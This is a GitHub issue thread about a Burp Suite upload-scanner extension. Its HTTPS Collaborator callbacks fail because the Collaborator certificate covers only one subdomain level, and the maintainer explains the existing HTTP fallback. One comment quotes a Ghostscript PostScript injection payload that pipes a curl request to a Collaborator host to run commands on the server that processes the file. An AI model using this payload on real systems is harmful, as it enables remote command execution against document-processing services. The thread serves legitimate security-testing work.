-
Notifications
You must be signed in to change notification settings - Fork 138
SSL cert. issue in burp collaborator #42
Comments
Example: %!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl https://NN.3im9vdr1rtg7k5witikj0hc1psvtohd.burpcollaborator.net/) currentdevice putdeviceprops
|
Hi there, So this is nearly never an issue, for the following reasons: a) the payload is always sent with http:// as well. So what you suggest is already implemented. So far I’ve only seen Imagemagick which supports HTTP but not HTTPS in certain cases, but it’s worth doing both tests usually, which it already does. b) when curl shows that error, we already get a DNS interaction meaning we already get an issue shown in Burp that shows that the injection was successful. The only exception to this rule is IP based Burp Collaborator servers, which are supported but not recommended for various reasons. And I’m not even sure how well IP based collaborators are supported in Burp and other extensions... However, there seems to be room for improvement. Instead of doing |
happy to help |
Will be fixed in the next version |
upload scanner is using https://NN.random_name.burpcollaborator.net/, but the SSL certificate is only valid for *.burpcollaborator.net which will throw a ssl error and the will got connection got interrupted. So instead of using
https
protocol, it needhttp
The text was updated successfully, but these errors were encountered: